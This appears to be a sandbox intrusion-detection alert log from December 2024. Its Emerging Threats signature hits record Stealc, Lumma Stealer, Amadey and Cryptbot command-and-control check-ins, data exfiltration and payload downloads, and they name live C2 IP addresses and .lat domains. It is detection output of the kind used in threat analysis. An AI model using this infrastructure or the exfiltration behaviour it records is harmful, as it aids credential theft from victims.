                                                                                                                                                                                                                                                          2024-12-19T14:20:26.535757+01002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config1185.215.113.20680192.168.2.449737TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:26.854501+01002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.449737185.215.113.20680TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:27.048275+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1185.215.113.20680192.168.2.449737TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:28.517116+01002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.449737185.215.113.20680TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:28.977663+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.449732TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:29.354435+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449737185.215.113.20680TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:30.452494+01002856121ETPRO MALWARE Amadey CnC Activity M21192.168.2.449741185.215.113.4380TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:30.609376+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742104.21.67.146443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:31.060716+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449742104.21.67.146443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:31.060716+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449742104.21.67.146443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:32.279873+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44974331.41.244.1180TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:32.531147+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745104.21.67.146443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:34.028377+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449745104.21.67.146443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:34.028377+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449745104.21.67.146443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:37.120524+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449755104.21.67.146443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:38.436336+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449755104.21.67.146443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:39.805617+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449762104.21.67.146443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:42.313538+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449767104.21.67.146443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:42.891385+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449768185.215.113.4380TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:44.430248+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44977231.41.244.1180TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:44.882069+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449773104.21.67.146443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:46.636348+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449765185.215.113.20680TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:48.037128+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449775104.21.67.146443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:48.912518+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449765185.215.113.20680TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:50.138977+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449765185.215.113.20680TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:50.480128+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449776185.215.113.4380TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:51.266488+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449765185.215.113.20680TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:52.033880+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44977931.41.244.1180TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:52.583026+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449780104.21.67.146443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:53.352697+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449780104.21.67.146443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:54.809774+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449765185.215.113.20680TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:56.178571+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449765185.215.113.20680TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:59.175395+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449791185.215.113.4380TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:00.625724+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44979731.41.244.1180TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:02.236712+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449803185.215.113.1680TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:04.556340+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449809185.215.113.4380TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:06.005584+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44981331.41.244.1180TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:11.498094+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449828185.215.113.4380TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:12.622049+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.4509021.1.1.153UDP
                                                                                                                                                                                                                                                          2024-12-19T14:21:13.985297+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.449834104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:13.985297+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449834104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:14.734365+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449834104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:14.734365+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449834104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:16.106715+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.449841104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:16.106715+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449841104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:16.737858+01002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.449842176.53.146.21280TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:16.873325+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449841104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:16.873325+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449841104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:18.416187+01002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.449851176.53.146.21280TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:19.591163+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.449854104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:19.591163+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449854104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:22.134347+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.449862104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:22.134347+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449862104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:22.935440+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449862104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:25.197121+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.449872104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:25.197121+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449872104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:30.420718+01002058354ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat)1192.168.2.4566871.1.1.153UDP
                                                                                                                                                                                                                                                          2024-12-19T14:21:30.832098+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.449899104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:30.832098+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449899104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:31.971712+01002058355ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI)1192.168.2.449902104.21.66.85443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:31.971712+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449902104.21.66.85443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:32.756623+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449902104.21.66.85443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:32.756623+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449902104.21.66.85443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:33.795974+01002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.449906176.53.146.21280TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:34.132800+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.449907104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:34.132800+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449907104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:34.176243+01002058355ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI)1192.168.2.449908104.21.66.85443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:34.176243+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449908104.21.66.85443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:34.937501+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449908104.21.66.85443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:34.937501+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449908104.21.66.85443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:37.661202+01002058355ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI)1192.168.2.449919104.21.66.85443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:37.661202+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449919104.21.66.85443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:38.057454+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.449921104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:38.057454+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449921104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:38.835067+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449921104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:38.891217+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449919104.21.66.85443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:40.737930+01002058355ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI)1192.168.2.449928104.21.66.85443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:40.737930+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449928104.21.66.85443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:43.073441+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44993531.41.244.1180TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:43.447455+01002058355ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI)1192.168.2.449937104.21.66.85443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:43.447455+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449937104.21.66.85443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:47.369976+01002058355ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI)1192.168.2.449947104.21.66.85443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:47.369976+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449947104.21.66.85443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:48.931341+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.449932TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:51.316959+01002058355ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI)1192.168.2.449957104.21.66.85443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:51.316959+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449957104.21.66.85443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:54.372788+01002058355ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI)1192.168.2.449968104.21.66.85443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:54.372788+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449968104.21.66.85443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:21:54.577672+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449965185.215.113.4380TCP
                                                                                                                                                                                                                                                          2024-12-19T14:22:37.395857+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.45007631.41.244.1180TCP
                                                                                                                                                                                                                                                          2024-12-19T14:22:47.414841+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.450072TCP
                                                                                                                                                                                                                                                          2024-12-19T14:22:48.754495+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450106185.215.113.4380TCP
                                                                                                                                                                                                                                                          2024-12-19T14:26:25.514691+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.450199185.215.113.4380TCP
                                                                                                                                                                                                                                                          2024-12-19T14:26:42.452422+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450205185.215.113.1680TCP
                                                                                                                                                                                                                                                          2024-12-19T14:26:46.769469+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.4628091.1.1.153UDP
                                                                                                                                                                                                                                                          2024-12-19T14:26:47.085719+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.4525081.1.1.153UDP
                                                                                                                                                                                                                                                          2024-12-19T14:26:47.993212+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.450204TCP
                                                                                                                                                                                                                                                          2024-12-19T14:26:48.535561+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450206172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:26:48.535561+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450206172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:26:49.339799+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450207185.215.113.4380TCP
                                                                                                                                                                                                                                                          2024-12-19T14:26:49.565641+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.450206172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:26:49.565641+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450206172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:26:50.797227+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450209172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:26:50.797227+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450209172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:26:50.797289+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450208185.215.113.1680TCP
                                                                                                                                                                                                                                                          2024-12-19T14:26:51.655598+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.450209172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:26:51.655598+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450209172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:26:53.255037+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450210172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:26:53.255037+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450210172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:26:55.737499+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450211172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:26:55.737499+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450211172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:26:56.536487+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.450211172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:26:57.823913+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450212172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:26:57.823913+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450212172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:26:58.790444+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450213185.215.113.20680TCP
                                                                                                                                                                                                                                                          2024-12-19T14:26:59.652395+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450214185.215.113.4380TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:00.057891+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450215172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:00.057891+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450215172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:01.550534+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.4651391.1.1.153UDP
                                                                                                                                                                                                                                                          2024-12-19T14:27:03.038207+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450217172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:03.038207+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450217172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:03.128293+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450218172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:03.128293+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450218172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:03.800281+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.450217172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:03.800281+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450217172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:05.026251+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450219172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:05.026251+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450219172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:05.804735+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.450219172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:05.804735+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450219172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:07.291702+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450222172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:07.291702+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450222172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:07.331948+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450221185.215.113.1680TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:07.517754+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450223172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:07.517754+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450223172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:08.298079+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450223172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:09.474149+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450224172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:09.474149+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450224172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:09.766186+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.450225185.215.113.1680TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:11.539584+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450227172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:11.539584+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450227172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:11.722132+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450226185.215.113.20680TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:11.775491+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.450220TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:12.432998+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450228185.215.113.4380TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:13.760081+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450229172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:13.760081+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450229172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:16.682561+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450235172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:16.682561+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450235172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:17.910886+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.4633681.1.1.153UDP
                                                                                                                                                                                                                                                          2024-12-19T14:27:18.985919+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450254185.215.113.1680TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:19.302928+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450255172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:19.302928+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450255172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:20.075103+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.450255172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:20.075103+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450255172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:20.267430+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450259185.215.113.20680TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:20.299447+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450260172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:20.299447+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450260172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:21.056839+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450260172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:21.299800+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450264172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:21.299800+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450264172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:22.060559+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.450264172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:22.060559+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450264172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:22.524270+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.450265185.215.113.1680TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:23.656120+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450267172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:23.656120+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450267172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:25.667175+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450268185.215.113.4380TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:25.848551+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450269172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:25.848551+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450269172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:27.949056+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450271172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:27.949056+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450271172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:28.405816+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450270185.215.113.20680TCP
